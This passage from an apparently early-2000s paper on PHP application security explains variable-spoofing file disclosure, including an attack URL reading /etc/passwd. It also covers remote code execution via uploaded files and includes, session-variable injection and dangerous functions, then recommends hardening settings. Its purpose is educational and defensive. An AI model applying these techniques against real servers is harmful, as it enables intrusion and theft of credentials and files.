described above the file is received and saved on the local disk (in the
location specified in the configuration for uploaded files, typically /tmp)
with a random filename (e.g "phpxXuoXG"). The PHP script then needs
information regarding the uploaded file to be able to process it. This is
actually provided in two different ways, one has been in use since early
versions of PHP 3, the other was introduced following our Advisory regarding
the issue I'm about to describe with the former method. Suffice to say the
problem is still alive and well, most scripts continue to use the old
method. PHP sets four global variables to describe the uploaded file, for
example (given the upload form above):

 $hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
 $hello_size = Size in bytes of file (e.g 1024)
 $hello_name = The original name of the file on the remote system (e.g
"c:\\temp\\hello.txt")
 $hello_type = Mime type of uploaded file (e.g "text/plain")

The PHP script then proceeds to work on the file as located via the $hello
variable. The problem is that it isn't immediately obvious that $hello need
not really be a PHP set variable and can simply be set by a remote attacker.
Take the following form input for example:

http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/
plain&hello_name=hello.txt

That results in the following global PHP variables (of course POST could be
used (even cookies)):

 $hello = "/etc/passwd"
 $hello_size = 10240
 $hello_type = "text/plain"
 $hello_name = "hello.txt"

This form input will provide exactly the variables the PHP scripts expects
to be set by PHP, but instead of working on an uploaded file the script will
infact be working on /etc/passwd (usually resulting in its content being
exposed). This attack can be used to expose the contents of all sorts of
sensitive files (in particular configuration files containing database and
other third tier server credentials).

I noted above that newer versions of PHP provide different methods for
determining the uploaded files (it's done via the HTTP_POST_FILES[] array
mentioned earlier). It also provides numerous functions to avoid this
problem, for example a function to determine if a particular file is
actually one that has been uploaded. These methods well and truly fix the
problem but there is certainly no shortage of scripts out there still using
the old method and still vulnerable to this sort of attack.

As an alternate attack assisted by file upload consider the following
example PHP code:

 <?php
  if (file_exists($theme)) // Checks the file exists on the local system (no
remote files)
   include("$theme");
 ?>

If the attacker can control $theme they can obviously use this to read any
file on the remote system (except that content inside PHP tags e.g "<?" will
be removed and interpreted probably crashing immediately). While this is a
problem the attackers ultimate goal is obviously to be able to execute
commands on the remote web server and they can't achieve that by getting the
include statement to work on remote files as discussed earlier. They
therefore need to get PHP code they define into a file local to the remote
machine. This sounds like an impossible task initially but file upload comes
to the rescue. If the attacker creates a file on their machine containing
PHP code to be executed (for example the passthru code shown earlier) then
creates a form which contains a file field called "theme" and uses this form
to submit the file to the script via file upload, PHP will be kind enough to
save the file and set $theme to the location of the attackers file on the
local machine. The file_exists() check will then succeed and the code will
be run.

Given command execution ability on the remote webserver the attacker will
obviously wish to attempt privilege escalation attacks or attacks on the
third tier servers, both of which will probably require a toolset not
present on the webserver. The file upload functionality once again makes
this a non issue, the attacker can simply upload the attack tools, have them
saved by PHP then use their code execution ability to chmod() the file and
execute it. For example, they could trivially upload a local root exploit
(through the firewall and past the IDS) and execute it.

"It was easier to know it than to explain why I knew it. If you were asked
to prove that two and two made four, you might find some difficulty, and yet
you are quite sure of the fact" - Sherlock Holmes

--- < 6. Library Files > ---------------------------------------------------

I've mentioned the include() and require() functions earlier, I also said
that they're generally used to support the concept of code libraries. What I
mean by that is that common bits of code are put into a separate file and
when needed in the application simply include()ed from the file. include()
and require() will take any specified filename and read the file and parse
its contents as PHP code.

Initially when people started developing and distributing PHP applications
they chose to distinguish library and main application code by giving
library files the '.inc' extension. However they quickly found this was a
bad move in general since such files aren't normally parsed as PHP code by
the PHP interpreter. If requested from the web server they will generally
have the full source code returned. This is because the PHP interpreter
(when used as an apache module) determines which files to parse for PHP code
based on the file's extension, the extensions to be interpreted can be
chosen by the administrator but usually a combination of the extensions
'.php', '.php4' and '.php3' is chosen. This is a real problem when sensitive
configuration data (e.g database credentials) is placed in PHP files that
don't have an appropriate extension since a remote attacker can easily get
the source.

The simplest solution (and the one that has since become favored) is simply
to give EVERY file a PHP parsed extension. This prevents a request to the
web server ever returning the raw source for a file that contains PHP code.
The problem here is that though the source will no longer be returned, by
requesting the file a remote attacker can have the code that is meant to be
used in a framework of other code executed out of context. This can lead to
all of the attacks I've described earlier.

An obvious example might be the following:

In main.php:
 <?php
  $libDir = "/libdir";
  $langDir = "$libdir/languages";

  ...

  include("$libdir/loadlanguage.php":
 ?>

In libdir/loadlanguage.php:
 <?php
  ...

  include("$langDir/$userLang");
 ?>

When libdir/loadlanguage.php is called in the defined context of main.php it
is perfectly safe. But because libdir/loadlanguage has the extension .php
(it doesn't have to have that extension, include() works on any file) it can
be requested and executed by a remote attacker. When out of context an
attacker can set $langDir and $userLang to whatever they wish.

"You know a conjuror gets no credit when once he has explained his trick and
if I show you too much of my method of working, you will come to the
conclusion that I am a very ordinary individual after all" - Sherlock Holmes

--- < 7. Session Files > ---------------------------------------------------

Later versions of PHP (4 and above) provide built-in support for 'sessions'.
Their basic purpose is to be able to save state information from page to
page in a PHP application. For example, when a user logs in to a web site,
the fact that they are logged in (and who they are logged in) could be saved
in the session. When they move around the site this information will be
available to all other PHP pages. What actually happens is that when a
session is started (it's typically set in the configuration file to be
automatically started on first request) a random session id is generated,
the session persists as long as the remote browser always submits this
session id with requests. This is most easily achieved with a cookie but can
also be done by achieved by putting a form variable (containing the session
id) on every page. The session is a variable store, a PHP application can
choose to register a particular variable with the session, its value is then
stored in a session file at the end of every PHP script and loaded into the
variable at the start of every script. A trivial example is as follows:

 <?php
  session_destroy(); // Kill any data currently in the session
  $session_auth = "shaun";
  session_register("session_auth"); // Register $session_auth as a session
variable
 ?>

Any later PHP scripts will automatically have the variable $session_auth set
to "shaun", if they modify it later scripts will receive the modified value.
This is obviously a very handy facility to have in a stateless environment
like the web but caution is also necessary.

One obvious problem is with insuring that variables actually come from the
session. For example, given the above code, if a later script does the
following:

 <?php
  if (!empty($session_auth))
   // Grant access to site here
 ?>

This code makes the assumption that if $session_auth is set, it must have
come from the session and not from remote input. If an attacker specified
$session_auth in form input they can gain access to the site. Note that the
attacker must use this attack before the variable is registered with the
session, once a variable is in a session it will override any form input.

Session data is saved in a file (in a configurable location, usually /tmp)
named 'sess_<session id>'. This file contains the names of the variables in
the session, their loose type, value and other data. On multi host systems
this can be an issue since the files are saved as the user running the web
server (typically nobody), a malicious site owner can easily create a
session file granting themselves access on another site or even examine the
session files looking for sensitive information.

The session mechanism also supplies another convenient place that an
attacker have their input saved into a file on the remote machine. For
examples above where the attacker needed PHP code in a file on the remote
machine, if they cannot use file upload they can often use the application
and have a session variable set to a value of their choosing. They can then
guess the location of the session file, they know the filename 'php<session
id>' they just have to guess the directory, usually /tmp.

Finally an issue I haven't found a use for is that an attacker can specify
any session id they wish (e.g 'hello') and have a session file created with
that id (for the example '/tmp/sess_hello'). The id can only contain
alphanumeric characters but this might well be useful in some situations.

"It is a mistake to confound strangeness with mystery" - Sherlock Holmes

--- < 8. Loose Typing And Associative Arrays > -----------------------------

Just a quick note about these factors.

PHP is a loosely typed language, that is, a variable has different values
depending on the context in which it is being evaluated. For example, the
variable $hello set to the empty string "" when evaluated as a number has
the value 0. This can sometimes lead to non intuitive results (a factor that
was important in the exploitation of phpMyAdmin in SRADV00008). If $hello is
set to "000" it is NOT equal to "0" nor will the function empty() return
true.

PHP arrays are associative, that is, the index to the array is a STRING and
can be set to any string value, it is not numerically evaluated. This means
that the array entry $hello["000"] is NOT the same as the array entry
$hello[0].

Applications need to be careful to validate user input with thought to the
above factors and to do so consistently. I.e don't test is something is
equal to 0 in one place and then validate it using empty() somewhere else.

"We want something more than mere preaching now" - Mr. Gregson

--- < 9. Target Functions > ------------------------------------------------

When looking for holes in PHP applications (when you have the source code)
it's useful to have a list of functions that are frequently misused or are
good targets if they happen to be used in a vulnerable manner in the target
application. If a remote user can affect the parameters to these functions
exploitation is often possible. The following is a non exhaustive breakdown.

PHP Code Execution:
require() and include() - Both these functions read a specified file and
interpret the contents as PHP code
eval() - Interprets a given string as PHP code
preg_replace() - When used with the /e modifier this function interprets the
replacement string as PHP code

Command Execution:
exec() - Executes a specified command and returns the last line of the
programs output
passthru() - Executes a specified command and returns all of the output
directly to the remote browser
`` (backticks) - Executes the specified command and returns all the output
in an array
system() - Much the same as passthru() but doesn't handle binary data
popen() - Executes a specified command and connects its output or input
stream to a PHP file descriptor

File Disclosure:
fopen() - Opens a file and associates it with a PHP file descriptor
readfile() - Reads a file and writes its contents directly to the remote
browser
file() - Reads an entire file into an array

"There is mystery about this which stimulates the imagination; where there
is no imagination there is no horror" - Sherlock Holmes

--- < 10. Protecting PHP > -------------------------------------------------

All of the attacks I've described above work perfectly on a default
installation of PHP 4. However as I've mentioned numerous times PHP is
endlessly configurable and many of these attacks can be defeated using those
configuration options. There is always a price for security though, so I've
classified the following configuration options according to their
painfulness:
 * = Mostly painless
 ** = Vaguely painful
 *** = Seriously hurts
 **** = Chinese Water Torture

Obviously my ratings are subjective so don't flame me for them. I will say
one thing though, if you use all of the options you'll have a very secure
PHP installation, even third party code will be reliably secure, it's just
that most of it won't work :)

**** - Set register_globals off
This option will stop PHP creating global variables for user input. That is,
if a user submits the form variable 'hello' PHP won't set $hello, only
HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is
best single option for PHP security, it will also kill basically every third
party application available and makes programming PHP a whole lot less
convenient.

*** - Set safe_mode on
I'd love to describe exactly what safe_mode does but it isn't documented
completely. It introduces a large variety of restrictions including:
 - The ability to restrict which commands can be executed (by exec() etc)
 - The ability to restrict which functions can be used
 - Restricts file access based on ownership of script and target file
 - Kills file upload completely
This is a great option for ISP environments (for which it is designed) but
it can also greatly improve the security of normal PHP environments given
proper configuration. It can also be a complete pain in the neck.

** - Set open_basedir
This option prevents any file operations on files outside specified
directories. This can effectively kill a variety of local include() and
remote file attacks. Caution is still required in regards to file upload and
session files.

** - Set display_errors off, log_errors on
This prevents PHP error messages being displayed in the returned web page.
This can effectively limit an attackers exploration of the function of the
script they are attacking. It can also make debugging very frustrating.

* - Set allow_url_fopen off
This stops remote files functionality. Very few sites really need this
functionality, I absolutely recommend every site set this option.

There may well be other great options I'm missing, please consult the PHP
documentation

"Our ideas must be as broad as nature if we are to interpret nature" -
Sherlock Holmes

--- < 11. Responsibility - Language Vs Programmer > ------------------------

I contend that it is very hard to write a secure PHP application (in the
default configuration of PHP), even if you try. It's not that PHP is a bad
language, it's amazingly easy to program in and has more builtin features
than any other language I know. However PHP has such emphasis on rapid
development and feature richness that two things happen:
 - Web designers and other non coders end up writing PHP applications. They
have no understanding whatsoever of the security implications of the code
they are writing. Partly this is because the mindset isn't what it should
be. A PHP application typically runs in the most exposed environment
possible, a universally accessible page on a web server. This means the
mindset should be of coding a network daemon that will be routinely
attacked, or of a setuid root application. Instead the mindset is
functionality at all costs like it would be while writing an unprivileged
local application. If your web server is penetrated it provides a gateway to
the third tier, it is always a bad thing, even if the access is as nobody
(as penetrating a PHP application will typically provide).
 - Code behaviour becomes unpredictable. An include() statement that
postfixes a user variable with "image.php" would normally be perfectly safe,
the user can only specify which directory to retrieve that file from (and
presumably cannot create a file image.php on the remote machine). When
remote files functionality is allowed it becomes a nightmare. This is
completely non intuitive.

A lot of people blame programmer's for the code they write, I personally
feel that if a language makes it hard for a programmer to write good code
(particularly by being counterintuitive) the language must itself take some
of the blame for the situation. It's not good enough to just say the
programmer should know better. In almost every PHP application I've audited
the programmer's have _tried_ to get it right and only been let down by
their understanding of the intricacies of PHP. In its search for the
ultimate functionality PHP has undermined the programmer's ability to
understand the workings of their code in all situations.

"I have all the facts in my journal, and the public shall know them" - John
Watson

--- < 12. Other > ----------------------------------------------------------

This is just a section for various other resources.

At a time when I thought no-one else was interested in PHP security, a few
great posts/advisories/papers have popped up:
- Rain Forest Puppy
 RFP 2101 - "RFPlutonium to fuel your PHP-Nuke"
 http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=2
- Jo�o Gouveia
 Many posts to Bugtraq, check them all out, but as a selection
 http://www.securityfocus.com/templates/archive.pike?list=1&mid=165519
 http://www.securityfocus.com/templates/archive.pike?list=1&mid=147104
- Jouko Pynnonen
 http://www.securityfocus.com/templates/archive.pike?list=1&mid=169045

There are many others, sorry I didn't list them all.

SecureReality have released a number of advisories regarding PHP
applications which should serve to illustrate the problems I've outlined in
this paper fairly well:
- SRADV00001 - Arbitrary File Disclosure through PHP File Upload
 http://www.securereality.com.au/sradv00001.html
- SRADV00003 - Arbitrary File Disclosure through IMP
 http://www.securereality.com.au/sradv00003.html
- SRADV00006 - Remote command execution vulnerabilities in phpGroupWare
 http://www.securereality.com.au/sradv00006.html
- SRADV00008 - Remote command execution vulnerabilities in phpMyAdmin and
phpPgAdmin
 http://www.securereality.com.au/sradv00008.txt
- SRADV00009 - Remote command execution vulnerabilities in phpSecurePages
 http://www.securereality.com.au/sradv00009.txt
- SRADV00010 - Remote command execution vulnerabilities in SquirrelMail
 http://www.securereality.com.au/sradv00010.txt
- SRADV00011 - Remote command execution vulnerabilities in WebCalendar
 http://www.securereality.com.au/sradv00011.txt

The last four were presented during my speech at the BlackHat Briefings in
Singapore and Asia in 2001. Audio/Video of the speech will (at some stage)
be available at http://www.blackhat.com. For anyone interested in security,
I can't suggest more strongly that you go to the briefings.

Finally, incase anyone wondered where the title came from and all those
quotes at the end of each section, they're from the short story "A Study In
Scarlet" by Sir Arthur Conan Doyle which was also the first story in which
the character Sherlock Holmes appeared.

"I must thank you for it all. I might not have gone but for you, and so have
missed the finest study I ever came across: a study in scarlet eh?" -
Sherlock Holmes